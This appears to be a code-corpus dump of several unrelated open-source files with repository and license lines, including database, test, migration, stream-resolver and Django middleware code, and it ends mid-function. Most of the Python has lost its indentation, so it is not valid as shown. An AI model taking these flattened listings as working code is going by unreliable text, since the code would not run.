return RowProxy(metadata, row, processors, keymap)
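    # The fixture's keymap maps every way a column can be addressed (column
    # object, string name, or positional index) to the same
    # (processor, key, index) triple, mirroring real result metadata.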
def _test_getitem_value_refcounts(self, seq_factory):
col1, col2 = object(), object()
def proc1(value):
return value
value1, value2 = "x", "y"
row = self._rowproxy_fixture(
[(col1, "a"), (col2, "b")],
[proc1, None],
seq_factory([value1, value2])
)
v1_refcount = sys.getrefcount(value1)
v2_refcount = sys.getrefcount(value2)
for i in range(10):
row[col1]
row["a"]
row[col2]
row["b"]
row[0]
row[1]
row[0:2]
eq_(sys.getrefcount(value1), v1_refcount)
eq_(sys.getrefcount(value2), v2_refcount)
def test_value_refcounts_pure_tuple(self):
self._test_getitem_value_refcounts(tuple)
def test_value_refcounts_custom_seq(self):
class CustomSeq(object):
def __init__(self, data):
self.data = data
def __getitem__(self, item):
return self.data[item]
def __iter__(self):
return iter(self.data)
self._test_getitem_value_refcounts(CustomSeq)
| mit |
dannyperry571/theapprentice | script.module.liveresolver/lib/liveresolver/resolvers/castamp.py | 10 | 1405 | # -*- coding: utf-8 -*-
import re,urllib,urlparse,base64
from liveresolver.modules import client,constants
from liveresolver.modules.log_utils import log
def resolve(url):
try:
id = urlparse.parse_qs(urlparse.urlparse(url).query)['c'][0]
try:
referer = urlparse.parse_qs(urlparse.urlparse(url).query)['referer'][0]
except:
referer= url
url = 'http://castamp.com/embed.php?c=%s&vwidth=640&vheight=380'%id
pageUrl=url
result = client.request(url, referer=referer,headers = {'Host':'www.castamp.com'})
result = urllib.unquote(result).replace('unescape(','').replace("'+'",'')
rplcs = re.findall('=(.+?).replace\([\"\'](.+?)[\"\']\s*,\s*[\"\']([^\"\']*)[\"\']',result)
result = re.sub('\/\*[^*]+\*\/','',result)
var = re.compile('var\s(.+?)\s*=\s*[\'\"](.+?)[\'\"]').findall(result)
var_dict = dict(var)
file = re.compile('\'file\'\s*:\s*(.+?),').findall(result)[-1]
file = var_dict[file]
rtmp = re.compile('(rtmp://[^\"\']+)').findall(result)[0]
for r in rplcs:
file = file.replace(r[1],r[2])
url = rtmp + ' playpath=' + file + ' swfUrl=http://p.castamp.com/cplayer.swf' + ' flashver=' + constants.flash_ver() + ' live=true timeout=15 swfVfy=1 pageUrl=' + pageUrl
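        # The assembled string uses librtmp option syntax
        # ("rtmp://host/app playpath=... swfUrl=... live=true ..."),
        # which players built on librtmp (e.g. rtmpdump) understand.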
return url
except:
return
| gpl-2.0 |
craffel/mir_eval | tests/mpl_ic.py | 3 | 12171 | # CREATED:2015-02-17 14:41:28 by Brian McFee <brian.mcfee@nyu.edu>
# this function is lifted wholesale from matploblib v1.4.2,
# and modified so that images are stored explicitly under the tests path
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import six
import functools
import gc
import os
import sys
import shutil
import warnings
import unittest
import nose
import numpy as np
import matplotlib.units
from matplotlib import cbook
from matplotlib import ticker
from matplotlib import pyplot as plt
from matplotlib import ft2font
from matplotlib.testing.noseclasses import KnownFailure
from matplotlib.testing.exceptions import ImageComparisonFailure
from matplotlib.testing.compare import comparable_formats, compare_images, \
make_test_filename
def knownfailureif(fail_condition, msg=None, known_exception_class=None):
"""
    Assume a test will fail if *fail_condition* is True. *fail_condition*
may also be False or the string 'indeterminate'.
*msg* is the error message displayed for the test.
If *known_exception_class* is not None, the failure is only known
if the exception is an instance of this class. (Default = None)
"""
# based on numpy.testing.dec.knownfailureif
if msg is None:
msg = 'Test known to fail'
def known_fail_decorator(f):
# Local import to avoid a hard nose dependency and only incur the
# import time overhead at actual test-time.
import nose
def failer(*args, **kwargs):
try:
# Always run the test (to generate images).
result = f(*args, **kwargs)
except Exception as err:
if fail_condition:
if known_exception_class is not None:
if not isinstance(err, known_exception_class):
# This is not the expected exception
raise
                    # (Keep the next ultra-long comment so it shows in
                    # console.)
# An error here when running nose means that you don't have
# the matplotlib.testing.noseclasses:KnownFailure plugin in
# use.
raise KnownFailure(msg)
else:
raise
if fail_condition and fail_condition != 'indeterminate':
raise KnownFailureDidNotFailTest(msg)
return result
return nose.tools.make_decorator(f)(failer)
return known_fail_decorator
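# Typical decorator usage (condition and message are illustrative):
#
#   @knownfailureif('svg' not in comparable_formats(),
#                   'Cannot compare svg files on this system')
#   def test_svg_output():
#       ...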
def _do_cleanup(original_units_registry):
plt.close('all')
gc.collect()
import matplotlib.testing
matplotlib.testing.setup()
matplotlib.units.registry.clear()
matplotlib.units.registry.update(original_units_registry)
warnings.resetwarnings() # reset any warning filters set in tests
class KnownFailureDidNotFailTest(KnownFailure):
pass
class CleanupTest(object):
@classmethod
def setup_class(cls):
cls.original_units_registry = matplotlib.units.registry.copy()
@classmethod
def teardown_class(cls):
_do_cleanup(cls.original_units_registry)
def test(self):
self._func()
class CleanupTestCase(unittest.TestCase):
'''A wrapper for unittest.TestCase that includes cleanup operations'''
@classmethod
def setUpClass(cls):
import matplotlib.units
cls.original_units_registry = matplotlib.units.registry.copy()
@classmethod
def tearDownClass(cls):
_do_cleanup(cls.original_units_registry)
def cleanup(func):
@functools.wraps(func)
def wrapped_function(*args, **kwargs):
original_units_registry = matplotlib.units.registry.copy()
try:
func(*args, **kwargs)
finally:
_do_cleanup(original_units_registry)
return wrapped_function
def check_freetype_version(ver):
if ver is None:
return True
from distutils import version
if isinstance(ver, six.string_types):
ver = (ver, ver)
ver = [version.StrictVersion(x) for x in ver]
found = version.StrictVersion(ft2font.__freetype_version__)
return found >= ver[0] and found <= ver[1]
class ImageComparisonTest(CleanupTest):
@classmethod
def setup_class(cls):
CleanupTest.setup_class()
cls._func()
@staticmethod
def remove_text(figure):
figure.suptitle("")
for ax in figure.get_axes():
ax.set_title("")
ax.xaxis.set_major_formatter(ticker.NullFormatter())
ax.xaxis.set_minor_formatter(ticker.NullFormatter())
ax.yaxis.set_major_formatter(ticker.NullFormatter())
ax.yaxis.set_minor_formatter(ticker.NullFormatter())
try:
ax.zaxis.set_major_formatter(ticker.NullFormatter())
ax.zaxis.set_minor_formatter(ticker.NullFormatter())
except AttributeError:
pass
def test(self):
baseline_dir, result_dir = _image_directories(self._func)
for fignum, baseline in zip(plt.get_fignums(), self._baseline_images):
for extension in self._extensions:
will_fail = extension not in comparable_formats()
if will_fail:
fail_msg = ('Cannot compare %s files on this system' %
extension)
else:
fail_msg = 'No failure expected'
orig_expected_fname = (
os.path.join(baseline_dir, baseline) + '.' + extension)
if (extension == 'eps' and
not os.path.exists(orig_expected_fname)):
orig_expected_fname = (
os.path.join(baseline_dir, baseline) + '.pdf')
expected_fname = make_test_filename(os.path.join(
result_dir,
os.path.basename(orig_expected_fname)), 'expected')
actual_fname = (
os.path.join(result_dir, baseline) + '.' + extension)
if os.path.exists(orig_expected_fname):
shutil.copyfile(orig_expected_fname, expected_fname)
else:
will_fail = True
fail_msg = 'Do not have baseline image %s' % expected_fname
@knownfailureif(
will_fail, fail_msg,
known_exception_class=ImageComparisonFailure)
def do_test():
figure = plt.figure(fignum)
if self._remove_text:
self.remove_text(figure)
figure.savefig(actual_fname, **self._savefig_kwarg)
plt.close(figure)
err = compare_images(expected_fname, actual_fname,
self._tol, in_decorator=True)
try:
if not os.path.exists(expected_fname):
raise ImageComparisonFailure(
'image does not exist: %s' % expected_fname)
if err:
raise ImageComparisonFailure(
'images not close: %(actual)s vs. %(expected)s'
' (RMS %(rms).3f)' % err)
except ImageComparisonFailure:
if not check_freetype_version(self._freetype_version):
raise KnownFailure(
"Mismatched version of freetype. Test "
"requires '%s', you have '%s'" %
(self._freetype_version,
ft2font.__freetype_version__))
raise
yield (do_test,)
def image_comparison(baseline_images=None, extensions=None, tol=13,
freetype_version=None, remove_text=False,
savefig_kwarg=None):
"""
call signature::
image_comparison(baseline_images=['my_figure'], extensions=None)
Compare images generated by the test with those specified in
    *baseline_images*, which must correspond; otherwise an
    ImageComparisonFailure exception is raised.
Keyword arguments:
*baseline_images*: list
A list of strings specifying the names of the images generated
by calls to :meth:`matplotlib.figure.savefig`.
*extensions*: [ None | list ]
If *None*, default to all supported extensions.
Otherwise, a list of extensions to test. For example ['png','pdf'].
*tol*: (default 13)
The RMS threshold above which the test is considered failed.
*freetype_version*: str or tuple
The expected freetype version or range of versions for this
test to pass.
*remove_text*: bool
Remove the title and tick text from the figure before
comparison. This does not remove other, more deliberate,
text, such as legends and annotations.
*savefig_kwarg*: dict
Optional arguments that are passed to the savefig method.
"""
if baseline_images is None:
raise ValueError('baseline_images must be specified')
if extensions is None:
# default extensions to test
extensions = ['png', 'pdf', 'svg']
if savefig_kwarg is None:
# default no kwargs to savefig
savefig_kwarg = dict()
def compare_images_decorator(func):
# We want to run the setup function (the actual test function
# that generates the figure objects) only once for each type
# of output file. The only way to achieve this with nose
# appears to be to create a test class with "setup_class" and
# "teardown_class" methods. Creating a class instance doesn't
# work, so we use type() to actually create a class and fill
# it with the appropriate methods.
name = func.__name__
# For nose 1.0, we need to rename the test function to
# something without the word "test", or it will be run as
# well, outside of the context of our image comparison test
# generator.
func = staticmethod(func)
func.__get__(1).__name__ = str('_private')
new_class = type(
name,
(ImageComparisonTest,),
{'_func': func,
'_baseline_images': baseline_images,
'_extensions': extensions,
'_tol': tol,
'_freetype_version': freetype_version,
'_remove_text': remove_text,
'_savefig_kwarg': savefig_kwarg})
return new_class
return compare_images_decorator
def _image_directories(func):
"""
Compute the baseline and result image directories for testing *func*.
Create the result directory if it doesn't exist.
"""
module_name = func.__module__
# mods = module_name.split('.')
# mods.pop(0) # <- will be the name of the package being tested (in
# most cases "matplotlib")
# assert mods.pop(0) == 'tests'
# subdir = os.path.join(*mods)
subdir = module_name
import imp
def find_dotted_module(module_name, path=None):
"""A version of imp which can handle dots in the module name"""
res = None
for sub_mod in module_name.split('.'):
try:
res = file, path, _ = imp.find_module(sub_mod, path)
path = [path]
if file is not None:
file.close()
except ImportError:
# assume namespace package
path = sys.modules[sub_mod].__path__
res = None, path, None
return res
mod_file = find_dotted_module(func.__module__)[1]
basedir = os.path.dirname(mod_file)
baseline_dir = os.path.join(basedir, 'baseline_images', subdir)
result_dir = os.path.abspath(os.path.join('result_images', subdir))
if not os.path.exists(result_dir):
cbook.mkdirs(result_dir)
return baseline_dir, result_dir
| mit |
zheguang/voltdb | src/catgen/catalog_utils/__init__.py | 2 | 1341 | #!/usr/bin/env python
# This file is part of VoltDB.
# Copyright (C) 2008-2014 VoltDB Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with VoltDB. If not, see <http://www.gnu.org/licenses/>.
from parser import parse
from strings import *
import os.path
# inspired by code from the Python Cookbook
def ensure_relative_path_exists(newdir):
if os.path.isdir(newdir):
pass
elif os.path.isfile(newdir):
raise OSError("a file with the same name as the desired " \
"dir, '%s', already exists." % newdir)
else:
head, tail = os.path.split(newdir)
print "Head, Tail: %s, %s" % (head, tail)
if head and not os.path.isdir(head):
ensure_relative_path_exists(head)
if tail:
os.mkdir(newdir)
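# Hypothetical usage: ensure_relative_path_exists('out/catalog/java')
# creates 'out', 'out/catalog' and 'out/catalog/java' as needed.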
| agpl-3.0 |
rupace10/mysql-connector-python | tests/test_setup.py | 12 | 5048 | # MySQL Connector/Python - MySQL driver written in Python.
# Copyright (c) 2013, 2014, Oracle and/or its affiliates. All rights reserved.
# MySQL Connector/Python is licensed under the terms of the GPLv2
# <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>, like most
# MySQL Connectors. There are special exceptions to the terms and
# conditions of the GPLv2 as it is applied to this software, see the
# FOSS License Exception
# <http://www.mysql.com/about/legal/licensing/foss-exception.html>.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""Unit tests for the setup script of Connector/Python
"""
import sys
import tests
import imp
import setupinfo
class VersionTests(tests.MySQLConnectorTests):
"""Testing the version of Connector/Python"""
def test_version(self):
"""Test validity of version"""
vs = setupinfo.VERSION
self.assertTrue(all(
[isinstance(vs[0], int),
isinstance(vs[1], int),
isinstance(vs[2], int),
isinstance(vs[3], str),
isinstance(vs[4], int)]))
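        # i.e. a tuple shaped like (2, 0, 3, 'a', 1): major, minor, patch,
        # pre-release tag ('a', 'b', 'rc' or '') and pre-release number
        # (values here are illustrative).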
def test___version__(self):
"""Test module __version__ and __version_info__"""
import mysql.connector
self.assertTrue(hasattr(mysql.connector, '__version__'))
self.assertTrue(hasattr(mysql.connector, '__version_info__'))
self.assertTrue(isinstance(mysql.connector.__version__, str))
self.assertTrue(isinstance(mysql.connector.__version_info__, tuple))
self.assertEqual(setupinfo.VERSION_TEXT, mysql.connector.__version__)
self.assertEqual(setupinfo.VERSION, mysql.connector.__version_info__)
class SetupInfoTests(tests.MySQLConnectorTests):
"""Testing meta setup information
    We are importing the setupinfo module inside the unit tests
to be able to actually do tests.
"""
def setUp(self):
# we temper with version_info, play safe, keep copy
self._sys_version_info = sys.version_info
def tearDown(self):
# we temper with version_info, play safe, restore copy
sys.version_info = self._sys_version_info
def test_name(self):
"""Test the name of Connector/Python"""
import setupinfo
self.assertEqual('mysql-connector-python', setupinfo.name)
def test_dev_statuses(self):
"""Test the development statuses"""
import setupinfo
exp = {
'a': '3 - Alpha',
'b': '4 - Beta',
'rc': '4 - Beta',
'': '5 - Production/Stable'
}
self.assertEqual(exp, setupinfo.DEVELOPMENT_STATUSES)
def test_package_dir(self):
"""Test the package directory"""
import setupinfo
exp = {
'': 'lib',
}
self.assertEqual(exp, setupinfo.package_dir)
def test_unsupported_python(self):
"""Test if old Python version are unsupported"""
import setupinfo
tmp = sys.version_info
sys.version_info = (3, 0, 0, 'final', 0)
try:
imp.reload(setupinfo)
except RuntimeError:
pass
else:
self.fail("RuntimeError not raised with unsupported Python")
sys.version_info = tmp
def test_version(self):
"""Test the imported version information"""
import setupinfo
ver = setupinfo.VERSION
exp = '{0}.{1}.{2}'.format(*ver[0:3])
self.assertEqual(exp, setupinfo.version)
def test_misc_meta(self):
"""Test miscellaneous data such as URLs"""
import setupinfo
self.assertEqual(
'http://dev.mysql.com/doc/connector-python/en/index.html',
setupinfo.url)
self.assertEqual(
'http://dev.mysql.com/downloads/connector/python/',
setupinfo.download_url)
def test_classifiers(self):
"""Test Trove classifiers"""
import setupinfo
for clsfr in setupinfo.classifiers:
if 'Programming Language :: Python' in clsfr:
ver = clsfr.replace('Programming Language :: Python :: ', '')
if ver not in ('2.6', '2.7', '3', '3.1', '3.2', '3.3'):
self.fail('Unsupported version in classifiers')
if 'Development Status ::' in clsfr:
status = clsfr.replace('Development Status :: ', '')
self.assertEqual(
setupinfo.DEVELOPMENT_STATUSES[setupinfo.VERSION[3]],
status)
| gpl-2.0 |
mattcongy/itshop | docker-images/taigav2/taiga-back/taiga/projects/custom_attributes/migrations/0003_triggers_on_delete_customattribute.py | 28 | 4785 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('custom_attributes', '0002_issuecustomattributesvalues_taskcustomattributesvalues_userstorycustomattributesvalues'),
]
operations = [
# Function: Remove a key in a json field
migrations.RunSQL(
"""
CREATE OR REPLACE FUNCTION "json_object_delete_keys"("json" json, VARIADIC "keys_to_delete" text[])
RETURNS json
LANGUAGE sql
IMMUTABLE
STRICT
AS $function$
SELECT COALESCE ((SELECT ('{' || string_agg(to_json("key") || ':' || "value", ',') || '}')
FROM json_each("json")
WHERE "key" <> ALL ("keys_to_delete")),
'{}')::json $function$;
""",
reverse_sql="""DROP FUNCTION IF EXISTS "json_object_delete_keys"("json" json, VARIADIC "keys_to_delete" text[])
CASCADE;"""
),
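# For example, once the function above is installed it can be exercised
# directly from psql (values are illustrative):
#   SELECT json_object_delete_keys('{"1": "a", "2": "b"}'::json, '1');
#   -- returns {"2":"b"}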
# Function: Remove a key in the json field of *_custom_attributes_values.values
migrations.RunSQL(
"""
CREATE OR REPLACE FUNCTION "clean_key_in_custom_attributes_values"()
RETURNS trigger
AS $clean_key_in_custom_attributes_values$
DECLARE
key text;
tablename text;
BEGIN
key := OLD.id::text;
tablename := TG_ARGV[0]::text;
EXECUTE 'UPDATE ' || quote_ident(tablename) || '
SET attributes_values = json_object_delete_keys(attributes_values, ' ||
quote_literal(key) || ')';
RETURN NULL;
END; $clean_key_in_custom_attributes_values$
LANGUAGE plpgsql;
""",
reverse_sql="""DROP FUNCTION IF EXISTS "clean_key_in_custom_attributes_values"()
CASCADE;"""
),
# Trigger: Clean userstorycustomattributes values before remove a userstorycustomattribute
migrations.RunSQL(
"""
CREATE TRIGGER "update_userstorycustomvalues_after_remove_userstorycustomattribute"
AFTER DELETE ON custom_attributes_userstorycustomattribute
FOR EACH ROW
EXECUTE PROCEDURE clean_key_in_custom_attributes_values('custom_attributes_userstorycustomattributesvalues');
""",
reverse_sql="""DROP TRIGGER IF EXISTS "update_userstorycustomvalues_after_remove_userstorycustomattribute"
ON custom_attributes_userstorycustomattribute
CASCADE;"""
),
# Trigger: Clean taskcustomattributes values before remove a taskcustomattribute
migrations.RunSQL(
"""
CREATE TRIGGER "update_taskcustomvalues_after_remove_taskcustomattribute"
AFTER DELETE ON custom_attributes_taskcustomattribute
FOR EACH ROW
EXECUTE PROCEDURE clean_key_in_custom_attributes_values('custom_attributes_taskcustomattributesvalues');
""",
reverse_sql="""DROP TRIGGER IF EXISTS "update_taskcustomvalues_after_remove_taskcustomattribute"
ON custom_attributes_taskcustomattribute
CASCADE;"""
),
# Trigger: Clean issuecustomattributes values before remove a issuecustomattribute
migrations.RunSQL(
"""
CREATE TRIGGER "update_issuecustomvalues_after_remove_issuecustomattribute"
AFTER DELETE ON custom_attributes_issuecustomattribute
FOR EACH ROW
EXECUTE PROCEDURE clean_key_in_custom_attributes_values('custom_attributes_issuecustomattributesvalues');
""",
reverse_sql="""DROP TRIGGER IF EXISTS "update_issuecustomvalues_after_remove_issuecustomattribute"
ON custom_attributes_issuecustomattribute
CASCADE;"""
)
]
| mit |
danakj/chromium | third_party/closure_compiler/compiler_test.py | 6 | 11550 | #!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from ast import literal_eval
import os
import tempfile
import unittest
from compile import Checker
from processor import FileCache, Processor
_SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
_SRC_DIR = os.path.join(_SCRIPT_DIR, os.pardir, os.pardir)
_RESOURCES_DIR = os.path.join(_SRC_DIR, "ui", "webui", "resources", "js")
_ASSERT_JS = os.path.join(_RESOURCES_DIR, "assert.js")
_CR_JS = os.path.join(_RESOURCES_DIR, "cr.js")
_CR_UI_JS = os.path.join(_RESOURCES_DIR, "cr", "ui.js")
_PROMISE_RESOLVER_JS = os.path.join(_RESOURCES_DIR, "promise_resolver.js")
_POLYMER_EXTERNS = os.path.join(_SCRIPT_DIR, "externs", "polymer-1.0.js")
_CHROME_SEND_EXTERNS = os.path.join(_SRC_DIR, "third_party", "closure_compiler",
"externs", "chrome_send.js")
_CLOSURE_ARGS_GYPI = os.path.join(_SCRIPT_DIR, "closure_args.gypi")
_GYPI_DICT = literal_eval(open(_CLOSURE_ARGS_GYPI).read())
_COMMON_CLOSURE_ARGS = _GYPI_DICT["default_closure_args"] + \
_GYPI_DICT["default_disabled_closure_args"]
_RUNNER_ARGS = ["enable-chrome-pass"]
class CompilerTest(unittest.TestCase):
_ASSERT_DEFINITION = Processor(_ASSERT_JS).contents
_PROMISE_RESOLVER_DEFINITION = (_ASSERT_DEFINITION +
Processor(_PROMISE_RESOLVER_JS).contents)
_CR_DEFINE_DEFINITION = (_PROMISE_RESOLVER_DEFINITION +
Processor(_CR_JS).contents)
_CR_UI_DECORATE_DEFINITION = Processor(_CR_UI_JS).contents
def setUp(self):
self._checker = Checker()
self._tmp_files = []
def tearDown(self):
for file in self._tmp_files:
if os.path.exists(file):
os.remove(file)
def _runChecker(self, source_code, closure_args=None):
file_path = "/script.js"
FileCache._cache[file_path] = source_code
out_file, out_map = self._createOutFiles()
args = _COMMON_CLOSURE_ARGS + (closure_args or [])
externs = [_POLYMER_EXTERNS, _CHROME_SEND_EXTERNS]
found_errors, stderr = self._checker.check(file_path,
externs=externs,
out_file=out_file,
runner_args=_RUNNER_ARGS,
closure_args=args)
return found_errors, stderr, out_file, out_map
def _runCheckerTestExpectError(self, source_code, expected_error,
closure_args=None):
_, stderr, out_file, out_map = self._runChecker(source_code, closure_args)
self.assertTrue(expected_error in stderr,
msg="Expected chunk: \n%s\n\nOutput:\n%s\n" % (
expected_error, stderr))
self.assertFalse(os.path.exists(out_file))
self.assertFalse(os.path.exists(out_map))
def _runCheckerTestExpectSuccess(self, source_code, expected_output=None,
closure_args=None):
found_errors, stderr, out_file, out_map = self._runChecker(source_code,
closure_args)
self.assertFalse(found_errors,
msg="Expected success, but got failure\n\nOutput:\n%s\n" % stderr)
self.assertTrue(os.path.exists(out_map))
self.assertTrue(os.path.exists(out_file))
if expected_output:
with open(out_file, "r") as file:
self.assertEquals(file.read(), expected_output)
def _createOutFiles(self):
out_file = tempfile.NamedTemporaryFile(delete=False)
out_map = "%s.map" % out_file.name
self._tmp_files.append(out_file.name)
self._tmp_files.append(out_map)
return out_file.name, out_map
def testGetInstance(self):
self._runCheckerTestExpectError("""
var cr = {
/** @param {!Function} ctor */
addSingletonGetter: function(ctor) {
ctor.getInstance = function() {
return ctor.instance_ || (ctor.instance_ = new ctor());
};
}
};
/** @constructor */
function Class() {
/** @param {number} num */
this.needsNumber = function(num) {};
}
cr.addSingletonGetter(Class);
Class.getInstance().needsNumber("wrong type");
""", "ERROR - actual parameter 1 of Class.needsNumber does not match formal "
"parameter")
def testCrDefineFunctionDefinition(self):
self._runCheckerTestExpectError(self._CR_DEFINE_DEFINITION + """
cr.define('a.b.c', function() {
/** @param {number} num */
function internalName(num) {}
return {
needsNumber: internalName
};
});
a.b.c.needsNumber("wrong type");
""", "ERROR - actual parameter 1 of a.b.c.needsNumber does not match formal "
"parameter")
def testCrDefineFunctionAssignment(self):
self._runCheckerTestExpectError(self._CR_DEFINE_DEFINITION + """
cr.define('a.b.c', function() {
/** @param {number} num */
var internalName = function(num) {};
return {
needsNumber: internalName
};
});
a.b.c.needsNumber("wrong type");
""", "ERROR - actual parameter 1 of a.b.c.needsNumber does not match formal "
"parameter")
def testCrDefineConstructorDefinitionPrototypeMethod(self):
self._runCheckerTestExpectError(self._CR_DEFINE_DEFINITION + """
cr.define('a.b.c', function() {
/** @constructor */
function ClassInternalName() {}
ClassInternalName.prototype = {
/** @param {number} num */
method: function(num) {}
};
return {
ClassExternalName: ClassInternalName
};
});
new a.b.c.ClassExternalName().method("wrong type");
""", "ERROR - actual parameter 1 of a.b.c.ClassExternalName.prototype.method "
"does not match formal parameter")
def testCrDefineConstructorAssignmentPrototypeMethod(self):
self._runCheckerTestExpectError(self._CR_DEFINE_DEFINITION + """
cr.define('a.b.c', function() {
/** @constructor */
var ClassInternalName = function() {};
ClassInternalName.prototype = {
/** @param {number} num */
method: function(num) {}
};
return {
ClassExternalName: ClassInternalName
};
});
new a.b.c.ClassExternalName().method("wrong type");
""", "ERROR - actual parameter 1 of a.b.c.ClassExternalName.prototype.method "
"does not match formal parameter")
def testCrDefineEnum(self):
self._runCheckerTestExpectError(self._CR_DEFINE_DEFINITION + """
cr.define('a.b.c', function() {
/** @enum {string} */
var internalNameForEnum = {key: 'wrong_type'};
return {
exportedEnum: internalNameForEnum
};
});
/** @param {number} num */
function needsNumber(num) {}
needsNumber(a.b.c.exportedEnum.key);
""", "ERROR - actual parameter 1 of needsNumber does not match formal "
"parameter")
def testObjectDefineProperty(self):
self._runCheckerTestExpectSuccess("""
/** @constructor */
function Class() {}
Object.defineProperty(Class.prototype, 'myProperty', {});
alert(new Class().myProperty);
""")
def testCrDefineProperty(self):
self._runCheckerTestExpectSuccess(self._CR_DEFINE_DEFINITION + """
/** @constructor */
function Class() {}
cr.defineProperty(Class.prototype, 'myProperty', cr.PropertyKind.JS);
alert(new Class().myProperty);
""")
def testCrDefinePropertyTypeChecking(self):
self._runCheckerTestExpectError(self._CR_DEFINE_DEFINITION + """
/** @constructor */
function Class() {}
cr.defineProperty(Class.prototype, 'booleanProp', cr.PropertyKind.BOOL_ATTR);
/** @param {number} num */
function needsNumber(num) {}
needsNumber(new Class().booleanProp);
""", "ERROR - actual parameter 1 of needsNumber does not match formal "
"parameter")
def testCrDefineOnCrWorks(self):
self._runCheckerTestExpectSuccess(self._CR_DEFINE_DEFINITION + """
cr.define('cr', function() {
return {};
});
""")
def testAssertWorks(self):
self._runCheckerTestExpectSuccess(self._ASSERT_DEFINITION + """
/** @return {?string} */
function f() {
return "string";
}
/** @type {!string} */
var a = assert(f());
""")
def testAssertInstanceofWorks(self):
self._runCheckerTestExpectSuccess(self._ASSERT_DEFINITION + """
/** @constructor */
function Class() {}
/** @return {Class} */
function f() {
var a = document.createElement('div');
return assertInstanceof(a, Class);
}
""")
def testCrUiDecorateWorks(self):
self._runCheckerTestExpectSuccess(self._CR_DEFINE_DEFINITION +
self._CR_UI_DECORATE_DEFINITION + """
/** @constructor */
function Class() {}
/** @return {Class} */
function f() {
var a = document.createElement('div');
cr.ui.decorate(a, Class);
return a;
}
""")
def testValidScriptCompilation(self):
self._runCheckerTestExpectSuccess("""
var testScript = function() {
console.log("hello world")
};
""",
"""'use strict';var testScript=function(){console.log("hello world")};\n""")
def testOutputWrapper(self):
source_code = """
var testScript = function() {
console.log("hello world");
};
"""
expected_output = ("""(function(){'use strict';var testScript=function()"""
"""{console.log("hello world")};})();\n""")
closure_args=["output_wrapper='(function(){%output%})();'"]
self._runCheckerTestExpectSuccess(source_code, expected_output,
closure_args)
def testCheckMultiple(self):
source_file1 = tempfile.NamedTemporaryFile(delete=False)
with open(source_file1.name, "w") as f:
f.write("""
goog.provide('testScript');
var testScript = function() {};
""")
self._tmp_files.append(source_file1.name)
source_file2 = tempfile.NamedTemporaryFile(delete=False)
with open(source_file2.name, "w") as f:
f.write("""
goog.require('testScript');
testScript();
""")
self._tmp_files.append(source_file2.name)
out_file, out_map = self._createOutFiles()
sources = [source_file1.name, source_file2.name]
externs = [_POLYMER_EXTERNS]
found_errors, stderr = self._checker.check_multiple(
sources, externs=externs, out_file=out_file,
closure_args=_COMMON_CLOSURE_ARGS)
self.assertFalse(found_errors,
msg="Expected success, but got failure\n\nOutput:\n%s\n" % stderr)
expected_output = "'use strict';var testScript=function(){};testScript();\n"
self.assertTrue(os.path.exists(out_map))
self.assertTrue(os.path.exists(out_file))
with open(out_file, "r") as file:
self.assertEquals(file.read(), expected_output)
def testExportPath(self):
self._runCheckerTestExpectSuccess(self._CR_DEFINE_DEFINITION +
"cr.exportPath('a.b.c');");
def testExportPathWithTargets(self):
self._runCheckerTestExpectSuccess(self._CR_DEFINE_DEFINITION +
"var path = 'a.b.c'; cr.exportPath(path, {}, {});")
def testExportPathNoPath(self):
self._runCheckerTestExpectError(self._CR_DEFINE_DEFINITION +
"cr.exportPath();",
"ERROR - cr.exportPath() should have at least 1 argument: path name")
def testMissingReturnAssertNotReached(self):
template = self._ASSERT_DEFINITION + """
/** @enum {number} */
var Enum = {FOO: 1, BAR: 2};
/**
* @param {Enum} e
* @return {number}
*/
function enumToVal(e) {
switch (e) {
case Enum.FOO:
return 1;
case Enum.BAR:
return 2;
}
%s
}
"""
args = ['warning_level=VERBOSE']
self._runCheckerTestExpectError(template % '', 'Missing return',
closure_args=args)
self._runCheckerTestExpectSuccess(template % 'assertNotReached();',
closure_args=args)
if __name__ == "__main__":
unittest.main()
| bsd-3-clause |
gfneto/bitcoin-abe | build/lib.linux-x86_64-2.7/Abe/Chain/Bitcoin.py | 29 | 1035 | # Copyright(C) 2014 by Abe developers.
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with this program. If not, see
# <http://www.gnu.org/licenses/agpl.html>.
from .Sha256Chain import Sha256Chain
class Bitcoin(Sha256Chain):
def __init__(chain, **kwargs):
chain.name = 'Bitcoin'
chain.code3 = 'BTC'
chain.address_version = '\x00'
chain.script_addr_vers = '\x05'
chain.magic = '\xf9\xbe\xb4\xd9'
Sha256Chain.__init__(chain, **kwargs)
| agpl-3.0 |
ccastell/Transfer-System | Website/env/lib/python3.5/site-packages/django/contrib/sessions/middleware.py | 129 | 3423 | import time
from importlib import import_module
from django.conf import settings
from django.contrib.sessions.backends.base import UpdateError
from django.core.exceptions import SuspiciousOperation
from django.utils.cache import patch_vary_headers
from django.utils.deprecation import MiddlewareMixin
from django.utils.http import cookie_date
class SessionMiddleware(MiddlewareMixin):
def __init__(self, get_response=None):
self.get_response = get_response
engine = import_module(settings.SESSION_ENGINE)
self.SessionStore = engine.SessionStore
def process_request(self, request):
